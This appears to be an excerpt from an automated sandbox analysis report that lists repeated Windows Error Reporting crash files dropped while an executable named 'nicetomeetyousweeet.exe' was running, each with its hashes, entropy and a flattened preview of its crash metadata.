                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.4.9.9.1.3.8.8.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.6.4.1.1.7.c.-.c.2.4.a.-.4.b.5.4.-.b.e.6.9.-.4.f.0.9.8.f.a.4.2.4.8.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.3.b.f.7.7.d.-.7.c.6.6.-.4.6.9.a.-.8.9.e.9.-.a.0.6.1.4.d.0.f.9.d.4.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_1fb44458e796dfa8c2264fc184488addca3878ea_147f691a_b45c7b55-2f28-47c6-aede-81446fead9c2\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.904744338323651
                                                                            Encrypted:false
                                                                            SSDEEP:192:eDbJ8W3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:6uWCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:C2DA896687DF6F225B757BE96E2446FB
                                                                            SHA1:063BF51BE74F08A6307D7099770CE6BE2F5548CA
                                                                            SHA-256:506D89ACA6DCA3DAF40AE755EB887FC1BAC14EB58C97789164E0417FF091CB5C
                                                                            SHA-512:40A6FFE32596AA0B9C03067CEA23F1E9789B0B0D1BFC8505565A9BFF441ECD86A7F1221D9F239739856B080C317E4B28D9117D9A7811314CEEEBFEC5DBCBE8D0
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.4.6.7.8.5.5.1.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.5.c.7.b.5.5.-.2.f.2.8.-.4.7.c.6.-.a.e.d.e.-.8.1.4.4.6.f.e.a.d.9.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.2.c.8.2.4.7.-.2.1.6.9.-.4.5.6.3.-.8.c.4.f.-.3.3.d.8.5.7.8.4.3.0.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_1fb44458e796dfa8c2264fc184488addca3878ea_147f691a_c1b5a384-2cd1-41c2-a28d-86947df22984\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9046336798319352
                                                                            Encrypted:false
                                                                            SSDEEP:192:wgDbJ8G3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:wUuGCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:6A5EAE17DB9E92EFC5E6F1BC7CB39C87
                                                                            SHA1:5672883CDBDD453C5E65F560222DE393822DDD6D
                                                                            SHA-256:0B905EC27271243EAFAEC821C252913E03905AFDBE31591BF3B0403FB2AFBD69
                                                                            SHA-512:F979AC3255AD3AB5B990C4414FADCB97EE52CEEAD7F80266118BF5FF7E309C4633F2A7254E0A9C1B068F2EAE5C416237AC220BEC812CC4E3DF82EC2C7C9DD48B
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.4.0.9.4.1.0.6.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.b.5.a.3.8.4.-.2.c.d.1.-.4.1.c.2.-.a.2.8.d.-.8.6.9.4.7.d.f.2.2.9.8.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.2.6.f.3.3.0.-.9.4.f.8.-.4.b.c.e.-.a.c.5.a.-.9.4.a.6.5.e.a.d.4.0.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_1fb44458e796dfa8c2264fc184488addca3878ea_147f691a_e6c78637-e7e6-4fc6-af0a-19bc5b4574c3\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9046499282920402
                                                                            Encrypted:false
                                                                            SSDEEP:192:rDbJ8H3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:fuHCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:21543C3054D2D99CD93F84D7B04C7E5A
                                                                            SHA1:F8E50C85CBB1674CF9DFAAC5F2F499037CA7534D
                                                                            SHA-256:B0808ED7D92A24E2995FB957486CC86E0099A1D48EBA7F035FD2EAB095BF51B9
                                                                            SHA-512:99F5B0EA0FD371241A3FE35AA838405D7DF140EFE4B5D05088F69D2B648C2B755028577982373826190E66BB08BB0C93799A749E0952126D29D33C8948B50709
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.5.6.6.8.1.1.1.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.c.7.8.6.3.7.-.e.7.e.6.-.4.f.c.6.-.a.f.0.a.-.1.9.b.c.5.b.4.5.7.4.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.3.1.c.e.7.1.-.c.7.6.0.-.4.1.d.a.-.b.0.e.3.-.b.a.7.4.3.9.a.f.5.3.5.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_09d38f23-d8cf-48fa-b7b7-a3e1d1c6367c\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9045575641706946
                                                                            Encrypted:false
                                                                            SSDEEP:192:CDbJ8O3B056rxf6js2ZrprzuiFpZ24IO824i:2uOS56rQjTzuiFpY4IO8M
                                                                            MD5:41DA96C15977ABE3DBBCA08418895C45
                                                                            SHA1:239B6720EDF85F3E4F2EDA329771011248F1F66D
                                                                            SHA-256:E6471FFA67B2C6B16BF52EFE32BF735BB4C7B5CCB3E0F9189F11D8A5B62F843D
                                                                            SHA-512:3A1A688BE5BFC06A2B42176126F29D7ED47638D8FFE1B2576BEDEB293634FA95B97EB55CA823511FB44C5BD7C726034B6E9DCF0CA9C6F5BB8453394C8DF5883B
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.5.1.4.1.9.1.4.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.d.3.8.f.2.3.-.d.8.c.f.-.4.8.f.a.-.b.7.b.7.-.a.3.e.1.d.1.c.6.3.6.7.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.1.2.d.f.b.5.-.7.4.e.d.-.4.c.b.0.-.9.5.3.3.-.1.3.4.e.a.2.3.d.a.2.8.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_127b9835-edd9-4526-bde7-aae0666f7205\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9046767939748109
                                                                            Encrypted:false
                                                                            SSDEEP:192:dDbJ8r3B056rxf6js2ZrprzuiFpZ24IO824i:JurS56rQjTzuiFpY4IO8M
                                                                            MD5:3D756E6CF18915D37BD3AB2FB7DAD6F7
                                                                            SHA1:4BF7EE516013CAD5E0DE33EAA508C28CA26AF863
                                                                            SHA-256:72A1E790C68876B529CB4CFFE9C94779938F11CD9EC9568774FAF5A23D4F3BC4
                                                                            SHA-512:0ABD3105F034CFFAD976674A12A135AA1FCE01A6FA3DB1182B6FDACB2BD6CB7ADFD0907073740C7F21858CF23528CB364F7DC198F33F4E57BED0D98DFD2E6724
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.4.7.9.1.1.3.2.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.7.b.9.8.3.5.-.e.d.d.9.-.4.5.2.6.-.b.d.e.7.-.a.a.e.0.6.6.6.f.7.2.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.b.1.f.a.3.1.-.3.e.8.c.-.4.0.7.9.-.b.8.f.3.-.c.2.1.1.2.4.d.0.5.b.5.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_31617c49-59cc-49e9-b8f5-d39acc1fdc22\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9049429883961965
                                                                            Encrypted:false
                                                                            SSDEEP:192:LGSDbJ883B056rxf6js2ZrprzuiFpZ24IO824i:yGu8S56rQjTzuiFpY4IO8M
                                                                            MD5:880D84034DF6AB009185C8D9F6642456
                                                                            SHA1:24462E4A4481019F12D12337C267D79D5A697931
                                                                            SHA-256:73F85D1708450D836EBA5E4D7D84FD2DB10BDB8177B0AD6D8E8BA8899390C7B9
                                                                            SHA-512:614F1BA851B1D8E19DA42488D228A349EA06B6AB045CDC071E749F9864612C3C9DEADFFB5076A8CE27494F1C10764A8CA3C0C439CFF75FD13F5A92ED21A90554
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.5.4.2.8.6.4.5.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.6.1.7.c.4.9.-.5.9.c.c.-.4.9.e.9.-.b.8.f.5.-.d.3.9.a.c.c.1.f.d.c.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.c.7.7.b.6.8.-.0.6.5.9.-.4.0.4.f.-.b.9.8.9.-.2.2.6.4.9.4.d.1.d.7.3.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_45582567-100e-4870-b8cb-3a8089fa6d16\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.8771634433821058
                                                                            Encrypted:false
                                                                            SSDEEP:192:l7DbJ8p3B056rxf6js2ZruzuiFpZ24IO824i:lvupS56rQjozuiFpY4IO8M
                                                                            MD5:8A10ECF09A2B714C665BB1BA8C0436CC
                                                                            SHA1:47657049788424038998A76FC33779EE72C1D1CB
                                                                            SHA-256:D6F23126A9BF0106858924AED15B487B8BEC2ED4389510CEEB1CAD19312CDE9B
                                                                            SHA-512:FDB666D2969544CE8AFED466A12AC8014C6EE2C85EB1C1D3F92A191EA5B903E80B0D1C14D811B687A48A9DE1CEF5D803B287922F9991985B836EBD022C772EDD
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.3.5.1.9.3.0.4.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.5.8.2.5.6.7.-.1.0.0.e.-.4.8.7.0.-.b.8.c.b.-.3.a.8.0.8.9.f.a.6.d.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.2.3.a.7.3.d.-.c.3.8.d.-.4.d.3.5.-.9.e.f.9.-.2.d.f.4.c.6.d.5.f.5.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_4d4a7982-530f-4f43-8adb-2f09a165a94a\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.8704205379516736
                                                                            Encrypted:false
                                                                            SSDEEP:192:gDbJ8c3B056rxf6js2ZrozuiFpZ24IO824i:UucS56rQjuzuiFpY4IO8M
                                                                            MD5:14214BF8D9D810D522162808DE3AF900
                                                                            SHA1:F733CCD1C81F38F581A1CCAF7F0C10FD9CA165DA
                                                                            SHA-256:2D89B8924579684D8D3466E3FBA1FA34536D3E5AAA9442EACCCA99186F182DDC
                                                                            SHA-512:14BEB2586A9C03CECC683AF56233433CD76185B1A987A020A71CC66C70AC0D3BE33E6687FF1E48DFB7CA67F178F6AE303E112269A87F1AE5D80E6E39B2323F23
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.3.4.4.8.5.7.4.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.4.a.7.9.8.2.-.5.3.0.f.-.4.f.4.3.-.8.a.d.b.-.2.f.0.9.a.1.6.5.a.9.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.c.4.e.7.7.e.-.5.8.4.9.-.4.a.3.0.-.b.a.b.8.-.1.7.b.0.d.5.0.3.d.1.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_54de7915-d0e8-4834-bce6-b8d1dfb043f3\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9047414061645268
                                                                            Encrypted:false
                                                                            SSDEEP:192:LZDbJ8g3B056rxf6js2ZrprzuiFpZ24IO824i:LNugS56rQjTzuiFpY4IO8M
                                                                            MD5:C74E688A2FA4A7625EAAD58EA908FD7B
                                                                            SHA1:F896125F792A7D9D755E068900F726C192F99EA8
                                                                            SHA-256:09A9F994DAC9095C6A11D67A1520457E9A410E7B750723530380221EDF7D5724
                                                                            SHA-512:FD88F83C5ADA95FF9D1D35A375EEEC64A71AACB5C644CDBB424A123DE4D14E5872D325256274E7E96C9DDC8F1D2039335BC07A7E5A22008EA8190CBCD509E491
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.4.1.5.6.3.4.6.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.d.e.7.9.1.5.-.d.0.e.8.-.4.8.3.4.-.b.c.e.6.-.b.8.d.1.d.f.b.0.4.3.f.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.2.8.d.0.d.8.-.5.b.a.4.-.4.a.b.e.-.9.e.0.9.-.e.1.7.7.b.1.a.a.f.7.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_6da32c7b-08cc-46cc-ab60-19b53caeade2\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9044091073352927
                                                                            Encrypted:false
